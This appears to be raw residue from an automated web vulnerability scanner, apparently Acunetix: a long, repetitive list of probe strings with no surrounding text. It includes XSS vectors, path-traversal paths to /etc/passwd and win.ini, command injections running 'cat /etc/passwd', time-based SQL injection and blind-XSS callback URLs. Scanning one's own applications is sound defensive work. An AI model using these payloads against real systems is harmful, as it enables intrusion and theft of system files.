../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<video><source onerror="javascript:prompt(907186)">

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(932652)"></g></svg>

1

1

response.write(9651234*9881526)

1

1

1<div style=width:expression(prompt(908121))>

1

'+response.write(9651234*9881526)+'

&cat /etc/passwd&

1

1

WEB-INF/web.xml

1<iframe src='data:text/html

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"+response.write(9651234*9881526)+"

1

'&cat /etc/passwd&'

1

WEB-INF\web.xml

1<body onload=prompt(903684)>

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

"&cat /etc/passwd&"

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942791)>

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

cat /etc/passwd

1

1

1

1<img src=xyz OnErRor=prompt(944293)>

1

-1)

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1

${99520+99734}

1<img/src=">" onerror=alert(938699)>

-1))

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

1

1

1

1<ScRiPt%20>prompt(957348)</sCripT>

1&n965334=v903936

PI4Ydm13'

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

)

1

1&lt

7POYDrEb')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

!(()&&!|*|*|

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'"()

\xf6<img acu onmouseover=prompt(978497) //\xf6>

u1Ltq8om'))

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

^(#$!@#$)(()))******

1

'

1

1

1<input autofocus onfocus=prompt(923675)>

-1

/etc/passwd

1

1

1

"

'

1

1

<a href='http://www.acunetix.com'>website security</a>

-1)

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

"

${@print(md5(acunetix_wvs_security_test))}

http://hitKcHXdgT6Pq.bxss.me/

acunetix_wvs_invalid_filename

[url=http://www.acunetix.com]website security[/url]

1

-1))

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

||cat /etc/passwd

1

comments

1_MI4us <ScRiPt >prompt(971008)</ScRiPt>

1

1

MfE2gu4f'

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

1

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

Cjg5Hxek')

http://www.acunetix.tst

1

1

1

'&dir&'

1

comments/.

1

rPw2YDwC'))

1

1

1

'"

file:///etc/passwd

"&dir&"

1

1

1'"()&%<ScRiPt >prompt(904388)</ScRiPt>

1

1

1

<!--

/\../\../\../\../\../\../\../etc/passwd

|dir

1

'"()&%<ScRiPt >prompt(986288)</ScRiPt>

1

1

1

1

1

WEB-INF/web.xml

1

'|dir

1_984450

1

1

1

"|dir

1

1

WEB-INF\web.xml

acu8987\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8987

1

1

1

1

../../../../../../../../../../windows/win.ini

acux2585\xc0\xbez1\xc0\xbcz2a\x90bcxuca2585

1

1

1

../../../../../../../../../../boot.ini

1<ScRiPt >prompt(992856)</ScRiPt>

1

1

1

1<script>prompt(948597)</script>

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(955156)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969131></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(989700)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(965381)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(907138)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<div style=width:expression(prompt(964999))>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<iframe src='data:text/html

1

1<body onload=prompt(922408)>

1

WEB-INF/web.xml

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(942594)>

1

WEB-INF\web.xml

1<img src=xyz OnErRor=prompt(979079)>

1

1

1<img/src=">" onerror=alert(920874)>

1

1

1<ScRiPt%20>prompt(905714)</sCripT>

1

1

1&lt

1

\xf6<img acu onmouseover=prompt(903238) //\xf6>

1

1

1<input autofocus onfocus=prompt(959996)>

1

<a href='http://www.acunetix.com'>website security</a>

1

[url=http://www.acunetix.com]website security[/url]

1

1_NLbi0 <ScRiPt >prompt(991553)</ScRiPt>

1

1

1

1

1

1

1

1

1

1

1

1

1

1

response.write(9793239*9015120)

1

1

1

'+response.write(9793239*9015120)+'

SomeCustomInjectedHeader:injected_by_wvs

1

&cat /etc/passwd&

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

"+response.write(9793239*9015120)+"

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

"&cat /etc/passwd&"

-1

1

1

1

cat /etc/passwd

${100293+99514}

../../../../../../../../../../etc/passwd.jpg

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

1

`cat /etc/passwd`

1

-1))

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1some_inexistent_file_with_long_name%00.jpg

1

1

1&n907704=v936249

|cat /etc/passwd#

tmzdlB9K'

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

'|'ld

xnfmSPFi')

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

1

testasp.vulnweb.com

B5yfViaL'))

^(#$!@#$)(()))******

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

-1

1

1

1

'

/etc/passwd

-1)

1

1

1

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

dW890VHv'

acunetix_wvs_invalid_filename

1

1

${@print(md5(acunetix_wvs_security_test))}\

http://hitet927OMPXd.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

MD2vCy25')

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

g8WeLy8a'))

comments

1

&dir

1

1

http://www.acunetix.tst

1

'"

comments/.

file:///etc/passwd

1'"()&%<ScRiPt >prompt(992409)</ScRiPt>

'&dir&'

1

1

<!--

1

1

'"()&%<ScRiPt >prompt(992626)</ScRiPt>

/\../\../\../\../\../\../\../etc/passwd

1

"&dir&"

1

1

1

WEB-INF/web.xml

1_961373

|dir

1

1

1

acu6053\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6053

WEB-INF\web.xml

1

'|dir

1

acux7055\xc0\xbez1\xc0\xbcz2a\x90bcxuca7055

1

"|dir

1

../../../../../../../../../../windows/win.ini

1<ScRiPt >prompt(975801)</ScRiPt>

1

1

1

../../../../../../../../../../boot.ini

1

1<script>prompt(998951)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(925266)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?995423></ScRiPt>

1

1

................windowswin.ini

1<ScRiPt >prompt(921110)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(992114)">

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(906626)"></g></svg>

1

response.write(9152046*9367779)

1<div style=width:expression(prompt(916867))>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

'+response.write(9152046*9367779)+'

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<iframe src='data:text/html

1

"+response.write(9152046*9367779)+"

&cat /etc/passwd&

1

1<body onload=prompt(984343)>

1

SomeCustomInjectedHeader:injected_by_wvs

'&cat /etc/passwd&'

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

WEB-INF/web.xml

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996515)>

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=xyz OnErRor=prompt(937182)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

-1

1<img/src=">" onerror=alert(931389)>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(976274)</sCripT>

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99046+100354}

1

1

1

|cat /etc/passwd#

1&lt

1

-1))

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

\xf6<img acu onmouseover=prompt(915878) //\xf6>

'|'ld

1&n986068=v970349

1some_inexistent_file_with_long_name%00.jpg

GO9V3AX1'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1<input autofocus onfocus=prompt(927514)>

"|"ld

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

KqYcbLi6')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

!(()&&!|*|*|

'"()

<a href='http://www.acunetix.com'>website security</a>

/etc/passwd

1

testasp.vulnweb.com

1FStOWUN'))

1

1

^(#$!@#$)(()))******

[url=http://www.acunetix.com]website security[/url]

'

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

-1

1

1

"

1_JCLXF <ScRiPt >prompt(996430)</ScRiPt>

"

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

1

-1)

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

http://hitQBy8AdCgbY.bxss.me/

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

acunetix_wvs_invalid_filename

-1))

1

&dir

1

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

comments

Gw8HMpgz'

1

1

'&dir&'

1

1

file:///etc/passwd

1

g3oAdI12')

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

http://www.acunetix.tst

"&dir&"

'"

1'"()&%<ScRiPt >prompt(975740)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

1

<!--

Jx54Nm1p'))

comments/.

1

|dir

1

'"()&%<ScRiPt >prompt(945816)</ScRiPt>

WEB-INF/web.xml

1

1

1

1

1

'|dir

1_967883

WEB-INF\web.xml

1

1

1

1

"|dir

1

1

../../../../../../../../../../windows/win.ini

acu5066\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5066

1

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acux8746\xc0\xbez1\xc0\xbcz2a\x90bcxuca8746

1

1

1

1

1

1<ScRiPt >prompt(926410)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<script>prompt(992663)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(971563)</ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?974253></ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992972)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<video><source onerror="javascript:prompt(986890)">

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(922033)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

response.write(9502373*9495775)

1<div style=width:expression(prompt(904289))>

1

1

1

'+response.write(9502373*9495775)+'

1<iframe src='data:text/html

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

"+response.write(9502373*9495775)+"

1<body onload=prompt(996404)>

WEB-INF\web.xml

1

1

1

'&cat /etc/passwd&'

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(953182)>

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

"&cat /etc/passwd&"

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(976597)>

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<img/src=">" onerror=alert(951600)>

-1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

${100470+100417}

1

`cat /etc/passwd`

1<ScRiPt%20>prompt(917025)</sCripT>

-1)

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1&n949231=v974181

|cat /etc/passwd#

1

1

1some_inexistent_file_with_long_name%00.jpg

1&lt

)

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

'|'ld

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

\xf6<img acu onmouseover=prompt(926414) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

xlBMDtMR'

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

"|"ld

testasp.vulnweb.com

'"()

1<input autofocus onfocus=prompt(930722)>

3hV2tLqx')

/etc/passwd

^(#$!@#$)(()))******

1

'

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

nPcjp82u'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

'

"

1

[url=http://www.acunetix.com]website security[/url]

1

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

http://hitxLnnkYheW2.bxss.me/

"

${@print(md5(acunetix_wvs_security_test))}

acunetix_wvs_invalid_filename

1_hvLyF <ScRiPt >prompt(931409)</ScRiPt>

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

comments

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

-1))

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

1

http://www.acunetix.tst

sB69AhDI'

file:///etc/passwd

1

comments

'"

1

1

1

'&dir&'

1

RmYwpB0v')

1

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

1'"()&%<ScRiPt >prompt(920123)</ScRiPt>

1

"&dir&"

iEMYbSNA'))

1

WEB-INF/web.xml

<!--

'"()&%<ScRiPt >prompt(937503)</ScRiPt>

1

1

|dir

1

1

WEB-INF\web.xml

1

1_954528

1

1

'|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

1

acu4606\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca4606

1

1

1

../../../../../../../../../../boot.ini

1

acux1402\xc0\xbez1\xc0\xbcz2a\x90bcxuca1402

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(932548)</ScRiPt>

1

1

1

1<script>prompt(973492)</script>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1<ScRiPt >prompt(942382)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?945869></ScRiPt>

1

1

1

1<ScRiPt >prompt(989440)</ScRiPt>

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<video><source onerror="javascript:prompt(960258)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(910837)"></g></svg>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

1<div style=width:expression(prompt(908038))>

response.write(9663966*9153022)

1

1

'+response.write(9663966*9153022)+'

1<iframe src='data:text/html

WEB-INF/web.xml

1

&cat /etc/passwd&

1

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF\web.xml

"+response.write(9663966*9153022)+"

1<body onload=prompt(994225)>

1

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(996764)>

1

"&cat /etc/passwd&"

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<img src=xyz OnErRor=prompt(965540)>

1

-1

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1

1

1

1<img/src=">" onerror=alert(940557)>

${100426+99977}

-1)

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

`cat /etc/passwd`

1

1

1

1<ScRiPt%20>prompt(936477)</sCripT>

1

-1))

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1some_inexistent_file_with_long_name%00.jpg

|cat /etc/passwd#

1

1

0AVYQS9n'

1&lt

1

1&n966897=v936684

)

/../..//../..//../..//../..//../..//etc/passwd.jpg

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1

1

1

kzT2HwyG')

\xf6<img acu onmouseover=prompt(965670) //\xf6>

testasp.vulnweb.com

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

9F5wsaoo'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(924336)>

'"()

1

/etc/passwd

1

'

-1

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

1

"

1

-1)

1

1

[url=http://www.acunetix.com]website security[/url]

1

${@print(md5(acunetix_wvs_security_test))}

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

acunetix_wvs_invalid_filename

-1))

1

http://hitpsiWQsnoMt.bxss.me/

1_HWAfr <ScRiPt >prompt(978994)</ScRiPt>

1

${@print(md5(acunetix_wvs_security_test))}\

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

1

comments

bm0mcZKe'

1

1

1

1

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

1

'&dir&'

1

file:///etc/passwd

C10Ak6s1')

1

1

http://www.acunetix.tst

1

comments/.

1

1

"&dir&"

1

/\../\../\../\../\../\../\../etc/passwd

wqbah2tT'))

'"

1

1'"()&%<ScRiPt >prompt(960948)</ScRiPt>

1

1

|dir

1

<!--

WEB-INF/web.xml

1

1

1

1

'|dir

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(992951)</ScRiPt>

1

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1_946583

1

1

1

1

../../../../../../../../../../boot.ini

acu8473\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8473

1

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux1984\xc0\xbez1\xc0\xbcz2a\x90bcxuca1984

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(979971)</ScRiPt>

1

1

1

................windowswin.ini

1

1<script>prompt(992012)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(972071)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?975460></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(925395)</ScRiPt>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(994501)">

1

response.write(9600263*9403602)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(905810)"></g></svg>

1

WEB-INF/web.xml

&cat /etc/passwd&

'+response.write(9600263*9403602)+'

1

1

1<div style=width:expression(prompt(909612))>

1

WEB-INF\web.xml

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

"+response.write(9600263*9403602)+"

1

1<iframe src='data:text/html

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(965805)>

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

cat /etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(929029)>

1

-1

${99325+99950}

`cat /etc/passwd`

1

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img src=xyz OnErRor=prompt(984369)>

1

-1)

1

|cat /etc/passwd#

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1<img/src=">" onerror=alert(993143)>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n907728=v940390

1

'|'ld

)

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1<ScRiPt%20>prompt(952448)</sCripT>

f4yuRraC'

1some_inexistent_file_with_long_name%00.jpg

1

!(()&&!|*|*|

1

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

c0xUllmO')

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

/etc/passwd

'"()

\xf6<img acu onmouseover=prompt(935688) //\xf6>

'

testasp.vulnweb.com

pPolulle'))

1

1

'

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<input autofocus onfocus=prompt(973727)>

"

1

1

-1

1

"

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}

||cat /etc/passwd

1

[url=http://www.acunetix.com]website security[/url]

1

http://hit7Y61wv4T47.bxss.me/

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

-1))

${@print(md5(acunetix_wvs_security_test))}\

1

&dir

1

1_Ylg3N <ScRiPt >prompt(913506)</ScRiPt>

1

1

is7HpywJ'

comments

file:///etc/passwd

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

http://www.acunetix.tst

1

8M7LJpA9')

'"

/\../\../\../\../\../\../\../etc/passwd

comments/.

1

"&dir&"

1

1

1

1

IlzdDYc2'))

1

<!--

WEB-INF/web.xml

1

1'"()&%<ScRiPt >prompt(903761)</ScRiPt>

|dir

1

1

1

1

1

1

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(980923)</ScRiPt>

'|dir

1

1

1

1

1

1_900954

../../../../../../../../../../windows/win.ini

1

"|dir

1

1

1

1

../../../../../../../../../../boot.ini

1

acu3499\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3499

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux6950\xc0\xbez1\xc0\xbcz2a\x90bcxuca6950

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(953455)</ScRiPt>

1

1

................windowswin.ini

1

1

